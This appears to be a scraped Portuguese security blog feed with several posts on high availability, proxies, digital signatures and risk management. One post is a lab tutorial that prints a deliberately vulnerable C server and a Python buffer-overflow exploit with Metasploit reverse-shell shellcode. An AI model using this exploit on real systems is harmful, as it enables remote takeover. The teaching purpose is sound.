Disponibilidade também é segurança

A agilidade requerida pelas corporações no cenário globalizado, exige soluções tecnológicas que possibilitem a sua presença contínua no universo virtual. Dependendo do seu porte e tipo de negócio, alguns minutos de indisponibilidade de seus sistemas computacionais podem representar perdas de milhares de reais (ou dólares).

Como a segurança da informação está fundamentada na tríade: Confidencialidade (permitir o acesso à informação somente a quem tem direito), Integridade (garantia de que a informação seja recuperada tal como foi armazenada) e Disponibilidade (a informação tem que estar disponível sempre que se fizer necessário), vamos abordar hoje uma solução de alta disponibilidade.

Normalmente quando pensamos em tais sistemas, imaginamos logo o cenários de grandes corporações, com servidores robustos, redundantes, storage com discos em RAID-5, robôs para backup, etc. Mas, fazendo uso de softwares livres, é possível construir sistemas de alta disponibilidade, investindo muito pouco.

Cenário típico

Vamos imaginar que uma empresa quer investir no comércio eletrônico, construindo um site para fazer vendas e/ou prestar algum tipo de serviço on-line. É sabido que esse tipo de site deve permanecer 24 horas por dia disponível para que seus clientes possam acessar quando desejarem, caso contrário, o eles procuram imediatamente outro site similar, traduzindo-se em prejuízo para a empresa.

Com esse cenário hipotético em mente, vamos desenvolver uma possível solução.

A alta disponibilidade pode ser provida através de dois links de internet de operadoras diferentes, conectados à um appliance firewall/load balancer que por sua vez fará o balanço de carga para dois servidores web respondendo pela camada de apresentação da aplicação. Cada servidor web fará acesso a um servidor de aplicações, cabendo à aplicação do servidor web comutar o acesso ao outro servidor de aplicações em caso de ausência de resposta do seu servidor primário. Ambos servidores de aplicações estarão acessando um único gerenciador de banco de dados por questões de integridade. O gerenciador de banco de dados será replicado em um servidor secundário, formando um cluster de alta disponibilidade com dois nós, o qual assumirá as transações em caso de failover do servidor primário, de forma transparente para a aplicação.

[Figura1] Esquema lógico com uso de storage.

As soluções mais comuns de alta disponibilidade para banco de dados prevêem a utilização de storages compartilhados entre os servidores do cluster, entretanto, essa solução apresenta o inconveniente de ter os storages como único ponto de falha, além de ser um equipamento adicional que pode representar uma parcela significativa do orçamento.

A solução que apresentamos, consiste na utilização do software DRBD – Distributed Replicated Block Device (http://www.drbd.org), que é largamente utilizada pela comunidade de software livre para implementar espelhamento de dispositivos de blocos (disco) entre dois servidores. Maiores detalhes serão abordados mais abaixo.

[Figura 2] Alta disponibilidade com uso de DRBD

As linhas pontilhadas representam caminhos alternativos entre os servidores web e o banco de dados.

Outro ponto de falha existente na solução é o Load Balancer, mas podemos considerar como um risco menor por se tratar de um dispositivo inteiramente “estado sólido”, sem uso de componentes mecânicos e cuja falha pode ser contornada com a conexão direta entre os roteadores e os servidores web.

Esse ponto de falha pode ser eliminado com uso de dispositivos que suportem redundância ou até mesmo com uso softwares como o UltraMonkey (http://www.ultramonkey.org/), também lar­gamente utilizado pela comunidade para prover balanceamento de carga.

[Figura 3] Load Balance com UltraMonkey

Essa solução é baseada no uso de sistema operacional Linux em máquinas redundantes, formando um cluster de alta disponibilidade com uso do Heartbeat (http://www.linux-ha.org).

A Arquitetura de Software

Como já foi citando anteriormente, a solução baseia-se totalmente no uso de softwares livres para evitar custos com licenciamento de softwares. Os servidores devem utilizar o sistema operacional Linux. Pessoalmente indicaria Debian ou Ubuntu Server por questões de facilidade de manutenção, mas distribuição Linux é como religião: cada um tem a sua preferência e não se discute.

As aplicações podem ser desenvolvidas com uso de tecnologias Java, por serem largamente utilizados e portáveis em sua essência.

Os servidores web podem ter suas funcionalidades atendidas pelo uso de Apache Tomcat e JSF (Java Server Faces) para o desenvolvimento da camada de apresentação das aplicações.

A camada de negócios pode ser desenvolvida na plataforma EJB – Enteprise Java Beans, executando em servidores de aplicações, lançando mão do JBoss ou GlassFish.

O EJB é um dos principais componentes da plataforma J2EE (Java 2 Enterprise Edition). É um componente do tipo servidor que executa no container do servidor de aplicação. Os principais objetivos da tecnologia EJB são fornecer um rápido e simplificado desenvolvimento de aplicações Java baseado em componentes distribuídas, transacionais, seguras e portáveis. O seu uso permite que aplicações da camada de apresentação criem instâncias de objetos remotos, de forma semelhante à tecnologia de web services, sendo que de forma mais robusta para soluções baseadas em Java.

O banco de dados utilizado pode ser o PostgreSQL, que, apesar de ser de uso livre, é tão robusto e estável quanto as soluções comerciais e comparáveis ao banco de dados Oracle, que hoje é referência de mercado.

A Solução para Alta Disponibilidade

O ponto chave da solução está no emprego do espelhamento do disco com uso do DRBD, aplicado aos servidores de bancos de dados, em conjunto como o uso do Heartbeat para prover alta disponibilidade através do recurso de failover.

Na figura seguinte, temos a representação de um cluster formado por dois servidores, sendo um primário que responde por todas as conexões provenientes da rede.

[Figura 4] Alta disponibilidade com Heartbeat.

O Heartbeat, executando no servidor secundário monitora constantemente o servidor primário. Havendo indisponibilidade do servidor primário, inicia-se o processo de failover e todas as funcionalidades são assumidas pelo secundário, havendo inclusive transferência de endereço IP, de tal forma que os clientes não são afetados, acessando os serviços pelo mesmo endereço IP inicial.

Uma vez que o servidor primário volte a ficar disponível, inicia-se o processo de failback, onde todas as funcionalidades são devolvidas do servidor secundário para o primário.

Para que o processo de transição entre os servidores primário e secundário seja efetiva, é necessário que os dados estejam replicados em ambos servidores, de forma consistente. Isso é obtido pelo uso do DRBD que “intercepta” todas as requisições de gravação em disco no servidor primário e replica para o servidor secundário através de um link de rede de alta velocidade, exclusivo entre os servidores e independente da infra-estrutura de rede local.

[Figura 5] DRBD em detalhes.

Essa conexão é obtida pelo uso de interfaces Gigabit Ethernet e cabo cross-over entre os servidores, que se comunicam de forma exclusiva por esse meio.

O Heartbeat do servidor secundário também utiliza essa conexão Gigabit para monitorar o estado do servidor principal e controlar as ações de failover e failback.

Quando o servidor primário retorna após uma condição de off-line, o DRBD se encarrega de fazer a sincronização dos discos, antes de efetivar as ações de failback. O mesmo ocorre se o servidor secundário ficar off-line, com a diferença que não é tomada nenhuma ação de failover/failback.

O DRBD pode trabalhar de duas formas: síncrona, onde as informações são gravadas simultaneamente nos dois servidores, ou assíncrona, onde a gravação entre os servidores são feitos de forma independentes, sendo mais indicado para conexões de baixa velocidade, como no caso se servidores fisicamente distantes.

Detalhes da Solução

Os links de internet, com velocidade inicial de 2 Mbps devem ser fornecidos por diferente operadoras de telecom, para prover redundância no acesso à internet. Preferencialmente, os pontos de entrada no prédio devem ser feitos em locais diferentes para minimizar os riscos de queda por fatores externos como um acidente de trânsito, por exemplo, que venha a derrubar um poste por onde passam os cabos de comunicação.

Os roteadores devem ser alugados como parte do contrato de prestação de serviços das operadoras, e devem prever a reposição dos mesmos em caso de pane, dentro no menor tempo possível, também previsto no SLA – Service Level Agreement (acordo de qualidade de serviço) do contrato.

Os endereços de ambas operadoras responderão pelo domínio de internet da empresa, cuja alternância pode ser provida pelo servidor DNS.

Uma vez que as requisições de conexões provenientes da internet cheguem ao site da empresa, o Load Balancer faz a distribuição das requisições entre os dois servidores web disponíveis. Esse dispositivo também pode cumprir a função de firewall de borda, provendo a segurança da rede em primeira instância.

Os servidores web e de aplicações (dois de cada) são localizados na DMZ, independentes entre si, com a mesma cópia da aplicações rodando em cada par de servidores e acessando o servidor de banco de dados localizado na rede interna.

Os servidores web e de aplicações poderiam rodar em cluster, mas não foram feitos dessa forma, para distribuir a carga entre diferentes servidores ao invés de trabalhar somente com um, deixando ou outro em stand-by.

O firewall interno isola a DMZ da rede interna, provendo a segurança em profundidade, agindo como uma segunda barreira de contenção caso o firewall externo seja comprometido (invadido). Ele também tem a finalidade de controlar o acesso aos servidores da rede, feitos a partir das estações da rede local, a fim de proteger contra ataques internos.

Para finalizar a infra-estrutura de alta disponibilidade, deve-se considerar as alternativas para a manutenção do fornecimento de energia elétrica. Como geralmente não é posível contar com diferentes fornecedores de energia elétrica, é necessário fazer uso de no-breaks e gerador de energia de emergência para suprir a alimentação dos equipamentos principais por um tempo superior ao tempo suportado pelo no-break.

Topologia Física da Solução

O diagrama a seguir, apresenta a configuração final da topologia física da solução, evidenciando as áreas distintas:

DMZ: Servidores que fornecem serviços para internet

Rede Local – Servidores: Segmento de rede exclusivo para servidores, protegidos pelo firewall interno.

Rede Local – Estações: Segmento de rede destinado às estações de trabalho da rede local.

[Figura 6] Topologia física da solução.

Nesse diagrama, foram incluídos um servidor e e-mail e DNS primário. O DNS secundário é respondido por um servidor interno, acessível pelo mapeamento de porta (port forward) feito pelo firewall interno.

Considerações finais

A solução ora apresentada visa atingir um ambiente de alta disponibilidade, a um custo reduzido pelo emprego de tecnologias de software de uso livre mas nem por isso, menos confiável ou de menor desempenho, sendo largamente aceitas como soluções mercado e endossadas por nomes de peso como IBM e Red Hat.

——

Adicione um comentário.

]]> http://drwhitehat.wordpress.com/2008/11/07/alta-disponibilidade-com-baixo-custo/feed/ 4 drwhitehat altadisp01 altadisp02 altadisp03a altadisp04 altadisp05 altadisp06 http://drwhitehat.wordpress.com/2008/10/31/proxy-navegando-por-procuracao/ http://drwhitehat.wordpress.com/2008/10/31/proxy-navegando-por-procuracao/#comments Fri, 31 Oct 2008 14:41:51 +0000 drwhitehat http://drwhitehat.wordpress.com/?p=202 ]]>

Num passado não muito distante…

Quando a internet começou a se popularizar, lá pela década de 80/90, a velocidade da última milha (da nossa casa até a operadora de telecomunicações) girava em torno de 33Kbps a 56Kbps, com acesso por linha discada e navegar na internet era um exercício de paciência. Se essa conexão fosse compartilhada por vários micros, numa pequena empresa, por exemplo, aí virava prova de admissão para um templo budista. Só sendo muito zen…

Hoje as coisas mudaram. Qualquer um pode ter na sua casa, uma conexão de banda larga (Velox, Speed, etc) de alta velocidade (?). Uma banda larga mínima gira em torno de 300 Kbps o que já é algo em próximo de 10 vezes à velocidade da linha discada. Conexões de 1 Mega (1000 Kbps) são relativamente acessíveis para se ter em casa enquanto que nos anos 90, navegar com essa velocidade era privilégio de poucos funcionários de provedores de internet. Você acha muito!? No Japão, a velocidade mais comum para banda larga é 100 Megas! Isso, aqui no Brasil, ainda é a velocidade da maioria das redes locais.

Entendendo a Função Cache

Voltando aos anos 90, para agilizar a navegação e preservar a banda (uso do link), usávamos o Proxy (traduzindo literalmente, procurador ou aquele que possui uma procuração), cumprindo a função de cache (memória intermediária).

O Proxy nada mais é do que um software que serve de intermediário entre o micro do usuário e a internet. Quando um usuário acessa uma página da internet, ao invés de estabelecer uma conexão direta com o servidor web, ele tem sua requisição encaminhada para o proxy e este faz a conexão em seu lugar. As páginas que retornam do servidor web, são recebidas pelo proxy e encaminhadas para o usuário, armazenando uma cópia na sua cache. Se qualquer outro usuário da rede (ou o mesmo usuário) quiser acessar a mesma página, o proxy retorna a cópia armazenada na sua cache, evitando o acesso à internet. Com isso, o tráfego para internet é reduzido e a resposta ao usuário é mais rápida.

Funções Agregadas

Como todas as requisições de acesso à internet passando pelo proxy, novas funções foram agregadas e ele passou a ser utilizado também para monitorar e restringir o tipo de conteúdo que pode ou não ser acessível aos usuários da rede.

Com a velocidades dos links disponíveis atualmente, o proxy passou a ter mais importância pelo controle de acesso à internet, do que propriamente pela sua função inicial de cache.

Com a proliferação de ataques de vírus, worms, trojans e outras pragas, a filtragem de conteúdo acessíveis aos funcionários de uma empresa passou a ser uma questão de segurança. Muito desses incidentes estão relacionados a acessos a sites de pornografia ou softwares piratas.

Outro aspecto importante no uso do proxy é a redução do desperdício de tempo gasto pelos funcionários, ao acessar sites que não tem nenhuma relação com o desempenho de suas atividades profissionais.

A filtragem de conteúdo é feito pela busca por palavras chaves, na maioria das vezes pela URL (endereço) dos sites. Geralmente costuma-se utilizar uma blacklist (lista negra) que contém os endereços ou palavras chaves que negam os acessos. Algumas vezes, sites são bloqueados indevidamente por conter palavras da blacklist, o que torna necessário o uso das whitelist (lista branca) com a relação de sites explicitamente permitidos.

O controle de acesso também pode implementado segundo duas formas de abordagem distintas: “tudo que não for explicitamente proibido, é permitido” ou “tudo que não for explicitamente permitido, é proibido”. Isso depende dos requisitos de segurança (ou tirania ) da empresa.

Desvio de Função

Quando um usuário acessa um servidor web, ele pode obter uma série de informações sobre ele . Como toda requisição de página é feita pelo proxy em última instância, ele também pode ser usado para fins de preservação da privacidade do usuário. Para todos os efeitos, quem está conectando no servido web é o proxy e não o usuário. Mas ainda assim, não são todos os proxies que “escondem” totalmente essas informações. (leia mais no meu artigo Entre na internet e te direi quem és)

——

Adicione um comentário.

]]> http://drwhitehat.wordpress.com/2008/10/31/proxy-navegando-por-procuracao/feed/ 1 drwhitehat proxycache http://drwhitehat.wordpress.com/2008/10/17/invadindo-matrix-entendendo-o-buffer-overflow/ http://drwhitehat.wordpress.com/2008/10/17/invadindo-matrix-entendendo-o-buffer-overflow/#comments Fri, 17 Oct 2008 09:00:36 +0000 drwhitehat http://drwhitehat.wordpress.com/?p=167 ]]>

Matrix – o filme

O filme “Matrix Reloaded” é um marco na indústria cinematográfica, não só pelos efeitos especiais, mas também do ponto de vista tecnológico, pela utilização de uma ferramenta de uso real no campo da segurança da informação.

A certa altura do filme, a personagem Trinity invade o computador da Matrix, utilizando o nmap para fazer o reconhecimento de portas e assim detectando a porta 22 (SSH) aberta. Explorando uma vulnerabilidade do ser­vidor SSH, utiliza um exploit denominado ’sshnuke’ para ganhar acesso ao servidor.

O nmap é uma ferramenta de reconhecimento largamente utilizada no dia-a-dia dos profissionais de segurança da informação (e dos crackers também), que permite mapeamento de portas utilizando diversas técnicas furtivas de reconhecimento além de identificar com boa precisão, o sistema operacional que roda no dispositivo remoto.

A vulnerabilidade explorada, como se vê na figura acima, SSHv1 CRC32, era uma vulnerabilidade real, mas o exploit (sshkuke), embora fosse fruto da imaginação do autor, é plenamente factível.

Entendendo o Buffer Overflow

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

void error(char *msg)
{
    perror(msg);
    exit(1);
}

void viewer(char *string)
{
        //declaracao de char buffer
        char buffer[1024];
        //a string do parametro eh copiada nesse buffer
        strcpy(buffer,string);
        //e depois mostrada na stdout
        printf("Mensagem recebida: %s\n",buffer);
	fflush;
}

int main(int argc, char *argv[])
{
     int sockfd, newsockfd, portno, clilen;
     char buffer[2000];
     struct sockaddr_in serv_addr, cli_addr;
     int n;
     if (argc < 2) {
         fprintf(stderr,"ERRO: porta nao especificada.\n");
         exit(1);
     }
     sockfd = socket(AF_INET, SOCK_STREAM, 0);
     if (sockfd < 0)
        error("ERRO ao abrir socket");
     bzero((char *) &serv_addr, sizeof(serv_addr));
     portno = atoi(argv[1]);
     serv_addr.sin_family = AF_INET;
     serv_addr.sin_addr.s_addr = INADDR_ANY;
     serv_addr.sin_port = htons(portno);
     if (bind(sockfd, (struct sockaddr *) &serv_addr,
              sizeof(serv_addr)) < 0)
              error("ERRO de 'bind'");
     listen(sockfd,5);
     clilen = sizeof(cli_addr);
     while(1)
     {
        newsockfd = accept(sockfd,
                 (struct sockaddr *) &cli_addr,
                 &clilen);
     if (newsockfd < 0)
          error("ERRO na recepcao");
     bzero(buffer,256);
     n = read(newsockfd,buffer,2000);
     if (n < 0) error("ERRO na leitura do socket");
     viewer(buffer);
     n = write(newsockfd,"A mensagem foi recebida pelo servidor.", strlen("A mensagem foi recebida pelo servidor."));
     if (n < 0) error("ERROR na gravacao do socket");
     }
     return 0;
}

#!/usr/bin/env python

import socket
import getopt
import sys

host = "172.16.56.128"
port = 1025

# linux_ia32_reverse -  LHOST=172.16.56.1 LPORT=4444 Size=202 Encoder=Alpha2 http://metasploit.com
shellcode = \
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" \
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x45" \
"\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x55\x41\x32\x41\x41\x32" \
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x48\x69\x36\x51\x6b" \
"\x6b\x31\x43\x77\x33\x73\x63\x31\x7a\x46\x62\x41\x7a\x33\x56\x36" \
"\x38\x4b\x39\x49\x71\x78\x4d\x4b\x30\x4f\x63\x33\x69\x4c\x70\x65" \
"\x6f\x68\x4d\x6f\x70\x57\x39\x74\x39\x4b\x49\x33\x6b\x41\x4a\x42" \
"\x48\x4c\x6c\x44\x50\x56\x58\x44\x41\x75\x36\x30\x68\x72\x31\x61" \
"\x4c\x73\x73\x33\x56\x43\x63\x4e\x69\x4b\x51\x6e\x50\x51\x76\x62" \
"\x70\x42\x71\x52\x73\x6c\x49\x48\x61\x30\x43\x68\x4d\x6d\x50\x63" \
"\x62\x42\x48\x74\x6f\x54\x6f\x63\x43\x52\x48\x35\x38\x36\x4f\x61" \
"\x72\x70\x69\x30\x6e\x4c\x49\x6a\x43\x61\x42\x63\x63\x4b\x39\x79" \
"\x71\x6e\x50\x76\x6b\x4a\x6d\x4b\x30\x45"

retaddr = "\x77\xe7\xff\xff"
buff = "A" * 1028 + retaddr + shellcode + "\x00"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(buff)
sock.close()
sock = None

Realizando o ataque

Os passos para executar o ataque de demonstração consistem no seguinte:

1. Inicialmente, colocamos o servidor para executar no Debian, rodando na VM, escutando a porta 1025.

2. Na máquina hospedeira, numa sessão shell, colocamos o netcat escutando na porta 4444 para receber a conexão de retorno.

3. Em outra sessão shell, executamos o nmap que confirma a existência do serviço (no caso, porta 1025) e em seguida, executamos o exploit.

4. No shell do netcat recebemos a conexão de callback do servidor, onde podemos digitar qualquer comando, herdando as permissões da conta em que o servidor é executado (no nosso caso root).

O uso da técnica de callback serve para burlar as regras do firewall, iniciando uma conexão da rede interna para a rede externa.

As telas a seguir, demonstram o ataque realizado:

Essa tela demonstra o nmap executado na máquina cliente, verificando as portas abertas no servidor, no intervalo de 1 a 2048, onde comprovamos a porta 1025 aberta.

Ainda na máquina cliente, comprovamos o funcionamento do servidor enviando uma mensagem de teste para ele, com o uso do comando echo, fazendo um pipe para o netcat e recebendo a mensagem de confirmação.

Num segundo momento, executamos o script de exploit, que envia o payload para o servidor.

No servidor podemos ver a mensagem de teste e posteriormente a mensagem de ataque onde se vê uma seqüência de letras “A” somente para preencher o buffer e em seguida a representação ASCII do payload.

Nessa tela podemos ver o netcat escutando a porta 4444 e depois recebendo a conexão do servidor. A comprovação de que estamos no servidor pode ser obtido pelo comando uname -a e a conta em execução pelo whoami.

Conclusões

Apesar de ser de difícil execução, por depender de endereços de memória específicos para cada compilação/versão de software e sistema operacional, uma vez elaborado o exploit para determinada versão, sua execução é trivial e extremamente perigosa pelo resultado que o atacante pode obter.

Esses ataques podem retornar um shell para o atacante, executar um flush no iptables (remover todas as regras do firewall), incluir contas de usuário, enviar e instalar um backdoor, etc.

Firewalls, especialmente os construídos sobre linux, não devem conter outros serviços para minimizar os riscos, já que um ataque a um serviço vulnerável nesse equipamento pode simplesmente torna-lo inócuo pela execução de um flush no iptables, eliminado todas as suas regras de controle de acesso.

Durante nossos testes, verificamos que o Ubuntu aborta o programa vulnerável (servidor) ao perceber uma tentativa de stack smashing (tentativa de corrupção dos endereços da pilha, usados nos ataques de buffer overflow), ao passo que o Debian não acusou nada. Isso significa que determinadas distribuições são mais seguras que outras.

E por fim, novas vulnerabilidades são descobertas todos os dias. Patches (correções) ou novas versões dos softwares vulneráveis são distribuídos tão logo essas vulnerabilidades sejam descobertas e divulgadas, devendo ser aplicadas o quanto antes aos nossos sistemas para minimizar os riscos.

Se quiser aprender mais sobre buffer overflow, veja as referências abaixo.

Referências

Michal Zalewski – SSH1 CRC-32 compensation attack detector vulnerability – 2001 em http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=1024

Denis Maggiorotto – Explanation of a remote buffer overflow vulnerability – 2007 em http://www.milw0rm.com/papers/160

Izick – Smack the Stack ( Advanced Buffer Overflow Methods ) – 2006 em http://www.milw0rm.com/papers/7

Mercy – Basic buffer overflow explained – 2002 em http://www.milw0rm.com/papers/97

——

Adicione um comentário

O que é Assinatura Digital

Com a informática tomando cada vez mais espaço nas relações humanas, naturalmente a informação e a comunicação escrita tem passado do papel para o meio digital. Até então todas as relações jurídicas têm sido documentadas em papel e autenticadas através da assinatura de próprio punho, carimbo ou chancela.

A assinatura tem poder de autenticidade porque pode ser cientificamente verificada, comprovando sua autoria. Assim, um documento escrito qualquer, quando assinado por alguém, constitui prova da ciência e/ou anuência do seu conteúdo pela pessoa que o assina, tendo a devida validade jurídica.

E com a informação em meio digital? Não há como imprimir as particularidades grafotécnicas da assinatura manuscrita para o meio digital. Uma assinatura manuscrita e “escaneada” (digitalizada) não possui qualquer valor jurídico porque pode ser reproduzida fielmente inúmeras vezes, sendo apenas representação da assinatura original e impedindo a comprovação da sua autenticidade. Assinar a superfície do CD também não garantiria que o seu conteúdo é autêntico. E quando a informação é transmitida de um lugar para outro? Não existe meio físico que possa comportar uma assinatura manuscrita.

Para substituir a assinatura manuscrita, criou-se a Assinatura Digital, que possui características próprias e distintas do seu equivalente manuscrito. É a forma de conferir à um arquivo de dados, que pode ser um texto, um programa, uma imagem, ou qualquer forma de informação armazenada em meio digital, três características básicas que conferem prova inegável da sua autoria:

• Autenticidade – o receptor pode confirmar que a assinatura foi feita pelo autor;

• Integridade – qualquer alteração do arquivo faz com que a assinatura não corresponda mais ao documento;

• Não repúdio ou Irretratabilidade – o autor não pode negar a autenticidade da mensagem.

Um pouco de criptografia

Para entender como essas características citadas são obtidas, precisamos entender alguns conceitos de criptografia.

A criptografia é a forma de prover o sigilo da informação através de mecanismos de codificação aplicados à uma mensagem, que permitem que somente o emissor e o destinatário dessa mensagem possa interpretá-la. Toda criptografia depende de um método de codificação (ou algorítimo) e de uma ou mais chaves. Mesmo que o algorítimo seja conhecido, o segredo da chave garante o sigilo da mensagem.

Existem dois tipos básicos de criptografia: simétrica e assimétrica.

Na criptografia simétrica, a mesma chave que codifica a mensagem, é utilizada para decodificar, portanto ela tem que ser de conhecimento comum entre emissor e receptor. Quando o receptor não conhece a chave, o emissor tem que transmiti-la ao receptor de alguma forma, expondo uma fragilidade do sistema.

Na criptografia assimétrica, é utilizado um par de chaves matematicamente relacionadas entre si sendo uma delas de conhecimento público e outra de uso privado do emissor. Apesar da sua relação, não há como descobrir uma chave partindo de seu par.

Uma mensagem criptografada por uma das chaves (seja publica ou privada) só pode ser descriptografada com o seu par correspondente. Essa característica, permite que esse tipo de criptografia atenda a duas funções distintas: Confidencialidade e Autenticidade. A Confidencialidade é obtida quando o emissor criptografa uma mensagem usando a chave pública do receptor e somente esse último pode decifrar a mensagem com a sua chave privada. A Autenticidade é obtida pelo uso inverso, ou seja, como uma mensagem criptografada pelo emissor, com a sua chave privada, permite que qualquer pessoa decifre a mensagem com a sua (dele) chave pública, comprovando a autenticidade da mensagem, já que esta só pode ter sido cifrada com a chave privada do emissor.

Além da criptografia garantir a confidencialidade da mensagem, de certa forma ela garante a integridade, pois qualquer alteração da mensagem criptografada gera uma anomalia na mensagem ao ser descriptografada, denunciando a corrupção da mensagem. Contudo, a forma mais adequada de garantir a integridade é com o uso de uma função de hash.

Um hash é uma espécie de criptografia de mão única. É um valor numérico de tamanho fixo, obtido através da aplicação de um modelo matemático, de tal forma que a alteração de um único bit na mensagem (ou arquivo), produz um hash de valor totalmente distinto do hash original. Portanto, se o hash de uma mensagem é gerada pelo emissor e enviada juntamente com ela, o receptor pode aplicar o mesmo algorítimo nessa mensagem e verificar se os hashes são idênticos, comprovando a integridade da mensagem.

Note que não há necessidade da mensagem estar criptografada para o uso do hash. Sua função, portanto, é garantir a integridade da mensagem e não a confidencialidade.

É importante citar que não há como obter a mensagem original a partir do seu hash e também, que é virtualmente impossível duas mensagens diferentes produzirem o mesmo valor de hash (chamado de “colisão”).

Certificados Digitais

Um certificado digital é uma espécie de “identidade digital”. É um arquivo em formato binário padronizado e autenticado, emitido por uma CA – Certificate Authority (Autoridade Certificadora). Ela contém, informações de identificação pessoal e a sua chave pública.

Quando alguém desejar obter sua chave pública, ela procura num catálogo de chaves públicas para poder criptografar a mensagem a ser enviada a você. Se o seu certificado não for emitido por uma CA (você pode gerar seu próprio certificado), você é tem que repassar sua chave pública ao emissor.

Para verificar se um certificado é válido, o interessado deve obter a chave pública da CA que emitiu o certificado e valida-la contra o certificado. Existem inúmeras CAs espalhadas pelo mundo e como fica inviável obter a chave pública de todas elas, existem as CAs Raiz, as quais autorizam as operações de todas as demais CAs, obtendo-se uma estrutura hierárquica que é conhecida como ICP – Infra-estrutura de Chaves Públicas ou em inglês, PKI – Public Key Infrastructure.

No Brasil, a ICP-Brasil controla oito CAs (até o momento): Receita Federal, SERPRO, Caixa Econômica Federal, Serasa, Presidência da República, Poder Judiciário, Imprensa Oficial e CertiSign.

Juntando Tudo

Agora que falamos de criptografia, hash e certificado digital, podemos entender o funcionamento da assinatura digital:

Em um primeiro momento o autor gera um hash do documento (mensagem ou arquivo) e usando sua chave privada, ele criptografa e armazena o hash criptografado junto ao documento original, gerando a assinatura digital.

Para verificar a autenticidade do documento, deve-se gerar um novo rash a partir desse documento (ou mensagem) e este novo hash comparado com hash contido na assinatura digital. Para isso, é necessário descriptografar a assinatura com a chave pública do autor.

Observe que diferente da assinatura manuscrita, a digital é sempre diferente para cada documento em função do valor de rash.

A autoria do documento é comprovada pela descriptografia da assinatura usando a chave pública do autor, que por sua vez, tem sua identidade confirmada pelo certificado digital, obtendo-se as características de autenticidade e o não repúdio. A integridade da mensagem é comprovada pela igualdade do hash recém calculado com o armazenado na assinatura.

Considerações

A assinatura digital já é reconhecida legalmente em diversos países, inclusive o Brasil. Para que tenha valor legal diante do governo brasileiro, segundo a Medida provisória 2.200-2, o certificado deve ser emitido por uma das instituições autorizadas pela ICP Brasil, a menos que acordada entre as partes de uma transação, o uso de outra CA qualquer.

A tecnologia tem se difundido rapidamente em função dos requisitos de agilidade das transações eletrônicas da sociedade tecnológica de hoje. Talvez não substitua totalmente o uso do papel e da assinatura manuscrita, mas certamente será de uso corriqueiro. O aspecto preocupante dessa tecnologia, é que ela se fundamenta no sigilo da chave privada. O vazamento ou cópia da chave privada, permite que o usuário tenha sua identidade personificada por outra pessoa, já que ela pode ser utilizada para assinar digitalmente os documentos e transações eletrônicos.

——

Adicione um comentário.

]]> http://drwhitehat.wordpress.com/2008/10/10/assinatura-digital-nao-e-assinatura-escaneada/feed/ 2 drwhitehat http://drwhitehat.wordpress.com/2008/10/03/seguranca-da-informacao-a-defesa-alem-do-perimetro/ http://drwhitehat.wordpress.com/2008/10/03/seguranca-da-informacao-a-defesa-alem-do-perimetro/#comments Fri, 03 Oct 2008 09:00:07 +0000 drwhitehat http://drwhitehat.wordpress.com/?p=153 ]]>

Ampliando horizontes

Quando falamos em Segurança da Informação, a maioria das pessoas pensa logo em “defender a rede contra ataque de hackers”, o que normalmente é feito no ponto de conexão da nossa rede com a internet. É a borda onde termina nosso território e começa a terra-sem-dono. Daí porque é tecnicamente chamado de “Defesa de Perímetro”.

O que essas pessoas não percebem é que ataques de crackers (e não hackers) são apenas um dos tipos de ameaças a qual uma empresa está sujeita. Não se pensa em uma falha de hardware, ocorrência de incêndios ou inundações, falha no sistema de fornecimento de energia elétrica, panes de refrigeração, exclusões ou alterações indevidas de informações (acidental ou intencional), espionagem ou sabotagem da concorrência, fraudes e roubos de informações, furto de equipamentos, etc, etc, etc…

O número de ameaças pode ser infinito, dependendo da paranóia de quem analisa. Veja o caso das diversas empresas que sucumbiram junto com os atentados de 11 de Setembro. Muitas não sobreviveram pela perda de sua força de trabalho; outras pela perdas de suas informações. O caso clássico é o da empresa que possuía seus servidores em uma das torres e os servidores redundantes na outra torre. Quem iria imaginar um ataque terrorista no centro de Nova York e nas duas torres!?

A Segurança da Informação, portanto, tem uma visão muito mais abrangente do que simplesmente defender a rede contra ataques de crackers ou vírus. Em sua essência, ela visa a manutenção da CIA. Não, não é a agência de inteligência do governo norte-americano. São as iniciais de Confidentiality, Integrity e Availability, ou Confidencialidade, Integridade e Disponibilidade.

• Confidencialidade visa garantir que a informação só estará acessível a quem tenha o devido direito, restringindo o acesso aos demais indivíduos.
• Integridade visa garantir que a informação não será alterada ou adulterada, seja acidental ou intencionalmente por que não possua permissão para tal.
• Disponibilidade visa garantir que a informação estará acessível sempre que for solicitada.

É importante ressaltar que a segurança é tratada em todas as formas de informação, seja ela digital, impressa ou até mesmo em forma de áudio e vídeo. Assim, um plano estratégico de negócios rabiscado no papel, constitui uma informação (nesse caso, muito valiosa) e deve receber o tratamento adequado no seu manuseio e descarte. Muitas empresas deixam escapar informações valiosas em suas latas de lixo!

Para atingir aos seus objetivos, a Segurança da Informação se utiliza de várias disciplinas distintas, cobrindo desde os aspectos técnicos da magnetização da informação na superfície do disco rígido às diretrizes estratégicas definidas pela alta direção, relacionadas à segurança, conforme veremos a seguir.

Gestão de Riscos

Para proteger algo, primeiro temos que saber o que proteger e de quais ameaças. Só assim podemos determinar como proteger. Para isso serve a Análise de Riscos: enumerar quais os riscos de determinadas ameaças comprometerem determinadas vulnerabilidades e quais os impactos decorrentes.

A possibilidade de um incêndio é uma vulnerabilidade muito comum para qualquer empresa. Para uma distribuidora de combustíveis, o risco (possibilidade de ocorrência) é muito maior do que para uma distribuidora de água mineral, dada a natureza do produto, que possibilita um número muito maior de ameaças. Dependendo da extensão de um incêndio, ele gera impactos na empresa, podendo variar de pequenos prejuízos materiais à perdas de vidas humanas e até a falência total da empresa.

Quantificando esses itens, torna possível identificar as prioridades das ações necessárias para mitigação desses riscos, já que poderemos quantificar, por exemplo, qual o tamanho do prejuízo decorrente de algumas horas (ou minutos) de sistema fora do ar por falta de energia elétrica, o que pode justificar a compra de um gerador próprio ou até mesmo a construção de um site mirror (instalações replicadas) com atualizações em tempo real.

